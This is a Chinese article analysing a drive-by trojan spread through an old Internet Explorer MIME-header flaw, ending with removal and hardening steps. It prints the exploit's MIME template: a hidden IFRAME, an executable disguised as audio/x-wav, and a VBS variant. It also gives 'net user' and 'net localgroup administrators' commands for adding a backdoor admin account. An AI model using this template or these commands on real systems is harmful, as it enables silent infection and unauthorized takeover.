49、当心!浏览网页也会中木马
如果我对你说浏览网页也会感染木马,你相信吗?
其实,这已经不是相信不相信的问题了,在半年前就有人使用这种技术来使人中招了!最近听说有人在浏览某个网站时中招,因此去那里看了看,在网页打开的过程中,鼠标奇怪的变成沙漏形状,看来的确是有程序在运行。打开计算机的任务管理器,可以看到多了一个wincfg.exe的进程。进程对应的文件在win2000下是c:\winnt\wincfg.exe,在win98下为c:\windows\wincfg.exe。运行注册表编辑器regedit,在HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Run发现wincfg.exe,哈哈,原来它将自己登记在注册表开机启动项中,这样每次开机都会自动运行wincfg.exe!
注:给你下套的人可以自己设定这个木马的启动键名和注册文件名,注册文件名也就是运行时进程里的名称,因此大家看到的结果可能不相同。
运行金山毒霸,报告发现“backdoor bnlite”,哦,原来是木马bnlite服务端改名为wincfg.exe。别看这个木马服务端程序不大(只有6.5K),但它的功能可不少:具有ICQ通报功能、远程删除服务端功能、设定端口和运行名称、IP报信(报告服务端所在的IP地址)、上传下载……如果你中了该木马,那么木马控制端所在完全可以通过这个木马在你的电脑上建立一个隐藏的FTP服务,这样别人就有全部权限进入你的电脑了!控制你的电脑将非常容易!
让我感兴趣的是,木马是如何下载到浏览了该主页的用户的计算机中、并运行起来的。在IE中点击“工具”→“Internet选项”→“安全”→“自定义安全级别”,将ActiveX相关选项全部都禁用,再浏览该网页,wincfg.exe还是下载并运行了!看来和ActiveX无关。在“自定义安全级别”中有关文件下载的选项都禁止,再浏览该网页,哈哈!这回wincfg.exe不再下载了。
我们来看看wincfg.exe是如何下载到浏览者计算机上的,在该网页上点击鼠标右键,选择其中的“查看源代码”,在网页代码最后面发现了可疑的一句:
IFRAME src="wincfg.eml" width=1 height=1
注意到其中的“wincfg.eml”了吗?大家都知道eml为邮件格式,网页中要eml文件干什么呢?非常可疑!再次浏览该网页,再看看任务管理器,wincfg.exe进程又回来了,原来问题就在这个文件上!既然问题在这文件上,当然想办法搞到这个文件看看了。用蚂蚁把文件下载下来,鼠标刚点上去,wincfg.exe又被执行了,真是阴魂不散啊!
打开a.eml,发现其内容如下:
From: "xxx" To: "xxx" Subject: xxxx
Date: Tue, 7 Apr 2001 15:16:57 +800
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/Html;
[1] [2] [3] [4]
charset="gb2312"
Content-Transfer-Encoding: quoted-printable
HTML>
HEAD>
/HEAD>
BODY bgColor=3D#ffffff>
iframe src=3Dcid:THE-CID height=3D0 width=3D0>
/BODY>
--2--
--1
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVQQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4
gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIh3BDsAAAAAAAAAAOAADwELAQQUAC
AAAAAQAAAAkAAAIL0AAACgAAAAwAAAAABAAAAQAAAAAgAABAAAAAEAAAAEAAAAAAAAAADQA
AAAEAAAAAA……(以下删掉一大节)
--1
你看到的类似“TVqQAAMAAAAEAAAA//8AAL”这样的字符,就是wincfg.exe经过base64编码的内容。上面这些代码中,关键的是下面这一段:
Content-Type: audio/x-wav;
name="wincfg.exe"
Content-Transfer-Encoding: base64
Content-ID:
其中,name="wincfg.exe"这一句定义了文件名称,在此为wincfg.exe。 而这一句:Content-Transfer-Encoding: base64则定义了代码格式为base64。
从这句Content-ID: 开始才是代码的起步,
“TVqQAAMAAAAEAAAA//8AAL”等为wincfg.exe文件的BASE64方式编码,这个以BASE64方式编码的文件会反编译成wincfg.exe文件并运行。这就是浏览该网页会中木马的原因!到此我就明白了,其实,所谓的浏览网页会中木马,只是网页制作者利用了微软IE浏览器中存在的漏洞进行攻击的一个案例而已,说白了就是利用了错误的MIME头进行攻击。
1.MIME简介
MIME(Multipurpose Internet Mail Extentions),一般译作“多用途的网际邮件扩充协议”。顾名思义,它可以传送多媒体文件,在一封电子邮件中附加各种格式文件一起送出。现在它已经演化成一种指定文件类型(Internet的任何形式的消息:e-mail,usenet新闻和Web)的通用方法。在使用CGI程序时你可能接触过MIME类型,其中有一行叫作Content-type的语句,它用来指明传递的就是MIME类型的文件(如text/html或text/plain)。
2.错误的MIME头漏洞的发现
该漏洞是由一个国外安全小组发现的,该小组发现在MIME在处理不正常的MIME类型时存在个问题,攻击者可以创建一个Html格式的E-mail,该E-mail的附件为可执行文件,通过修改MIME头,使IE不正确处理这个MIME所指定的可执行文件附件。在此,我们来了解一下,IE是如何处理附件的:一般情况下如果附件是文本文件,IE会读它,如果是VIDEO CLIP,IE会查看它;如果附件是图形文件,IE就会显示它;如果附件是一个EXE文件呢?IE会提示用户是否执行!但令人恐惧的是,当攻击者更改MIME类型后,IE就不再提示用户是否执行而直接运行该附件!从而使攻击者加在附件中的程序、攻击命令能够按照攻击者设想的情况进行。大家不妨想像一下,如果前面提到的wincfg.exe不是木马,而是恶意程序江民炸弹又会怎么样?刹那间,你的硬盘就完蛋了(如果你不懂解法的话)!在Win9X\ME以及WinNT4和Win2k下的Internet EXPlorer 5.0、5.01、5.5均存在该漏洞,我们常用的微软邮件客户端软件Outlook Express也存在此漏洞。
[1] [2] [3] [4]
3.错误的MIME头漏洞的危害
让我们来看一下如果把上面所说的代码中最后这部分变为下面这样,会产生什么结果呢?
--1
Content-Type: audio/x-wav;
name="hello.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID:
msgbox("你的计算机好危险哦") 说明:在此可以加上任意的VBS的代码
--1
将该程序编辑存为eml格式的文件,我们运行它,可以看到屏幕上打开一个窗体,显示“你的计算机好危险哦”。对于这种利用错误的MIME头漏调用VBS文件的形式,会有多大危害呢?想一想,当初的爱虫病毒是怎么样的?爱虫病毒还需要骗你执行它才使你中毒,但一旦和错误MIME头漏洞结合起来,就根本不需要你执行了,只要你收了这封信且阅读它,你就中招了。
不仅如此,MIME还可以与command、cmd命令相结合,进行进一步的攻击。
对于WIN9X用户来说,只要你的IE浏览器是5.0、5.01、5.5之中的任意一个版本,在没打补丁的情况下,攻击者完全可以利用欺骗的方式让你打开含有攻击命令的、带有错误MIME头的E-mail文件,达到攻击的目的。事实上,format、deletetree、move等一切MS-DOS下的命令均可加载在其中。
而对于WINNT、WIN2K用户,尤其是那些不安分守己且网络安全知识贫乏的系统管理员,利用公司的主服务器上网,攻击者可以给他发封信,然后利用在以上所示代码中加上诸如:
net user test 1234567/add
net localgroup administrators test/add
这样的命令增加用户或者超级用户权限,达到进一步入侵的目的。
现在,再回过头来看看我所中的木马是怎么回事。其实,wincfg.exe这个文件在这里相当于邮件的附件,从我们所列的代码中可以看到,攻击者把wincfg.exe的的类型定义为audio/x-wav,由于邮件的类型为audio/x-wav时,IE存在的这个错误的MIME头漏洞会将附件认为是音频文件自动尝试打开,结果导致邮件文件a.eml中的附件wincfg.exe被执行。在win2000下,即使是用鼠标点击下载下来的a.eml,或是拷贝粘贴该文件,都会导致a.eml中的附件被运行,微软的这个漏洞可真是害人不浅啊。现在看来,原先那些攻击者想方设法欺骗被攻击目标执行修改过的木马等后门程序,是多么落后的手段啊!如今,利用微软“创造”的这个大漏洞来进行攻击,是那么的简单、多么的容易啊!唯一的条件就是被攻击目标使用IE5.0、5.01、5.5这些浏览器中的一种,使用IE浏览器的用户到底有多少呢?看看你身边的朋友就知道答案了!
解决办法:
如果你浏览网页中了该木马,可以用下面的方法来加以解决:
(1)点击“开始”→“运行”,在弹出的对话框中输入regedit,回车。然后展开注册表到HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\CurrentVersion\Run下删除wincfg.exe;
(2)到你的计算机的系统目录下,如果操作系统是Win2000,则到c:\winnt下;如果你的操作系统为Win98,则到c:\windows下,删除其中的wincfg.exe 文件。
(3)重新启动机器,一切OK了!
预防方法:
1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE,用FoxMail代替Outlook。如果非要用,建议你按下面的方法进行操作:
(1)运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别”,把安全极别由“中”改为“高”。
(2)接着,点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”选项。
(3)同理,在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
(4)禁用所有的ActiveX控制和插件。
(5)设置资源管理器成“始终显示扩展名”。
(6)禁止以WEB方式使用资源管理器。
(7)取消“下载后确认打开”这种扩展名属性设置。
(8)永远不直接从IE浏览器中选择打开文件。
[1] [2] [3] [4]
2.不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载工具把页面下载下来,然后用记事本等一些文本编辑工具打开查看代码。
3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows/ie/download/critical/Q290108/default.ASP
(出处:http://www.sheup.com)
(出处:http://www.sheup.com/)